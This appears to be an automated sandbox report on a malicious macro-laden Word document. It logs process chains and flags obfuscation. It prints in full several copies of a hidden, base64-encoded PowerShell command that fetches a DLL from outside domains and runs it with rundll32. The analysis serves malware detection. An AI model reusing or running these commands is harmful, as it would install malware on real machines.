pADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvAC
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Agilzgamuljjdwml\mwfcqgtqrgsdamx.pjv',NRUAmATPeNJ
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Agilzgamuljjdwml\mwfcqgtqrgsdamx.pjv',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Obbeicpozdckojlb\bhzpo.yca',VDZITWzoE
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Obbeicpozdckojlb\bhzpo.yca',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpqpm\gwvn.lsl',KCoulWayDpJU
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpqpm\gwvn.lsl',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Upjyf\ffrm.rmq',iFoslrVsudBDI
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Upjyf\ffrm.rmq',#1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvAC Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Agilzgamuljjdwml\mwfcqgtqrgsdamx.pjv',NRUAmATPeNJ Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Agilzgamuljjdwml\mwfcqgtqrgsdamx.pjv',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Obbeicpozdckojlb\bhzpo.yca',VDZITWzoE Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Obbeicpozdckojlb\bhzpo.yca',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpqpm\gwvn.lsl',KCoulWayDpJU Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpqpm\gwvn.lsl',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Upjyf\ffrm.rmq',iFoslrVsudBDI Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Upjyf\ffrm.rmq',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2092551442.0000000002847000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2097930376.000000001B390000.00000002.00000001.sdmp
Source: PO# 01222021.doc Initial sample: OLE summary subject = Steel Cambridgeshire productivity orchestration Handmade Soft Gloves program Regional Gorgeous quantify payment RSS

Data Obfuscation:

barindex
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: PO# 01222021.doc Stream path 'Macros/VBA/Dulz0g2a3qqdjsty7' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Dulz0g2a3qqdjsty7 Name: Dulz0g2a3qqdjsty7
Document contains an embedded VBA with many randomly named variables
Source: PO# 01222021.doc Stream path 'Macros/VBA/Dulz0g2a3qqdjsty7' : High entropy of concatenated variable names
Document contains an embedded VBA with many string operations indicating source code obfuscation
Source: PO# 01222021.doc Stream path 'Macros/VBA/Dulz0g2a3qqdjsty7' : High number of string operations
Source: VBA code instrumentation OLE, VBA macro, High number of string operations: Module Dulz0g2a3qqdjsty7 Name: Dulz0g2a3qqdjsty7
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcA
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvAC
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwA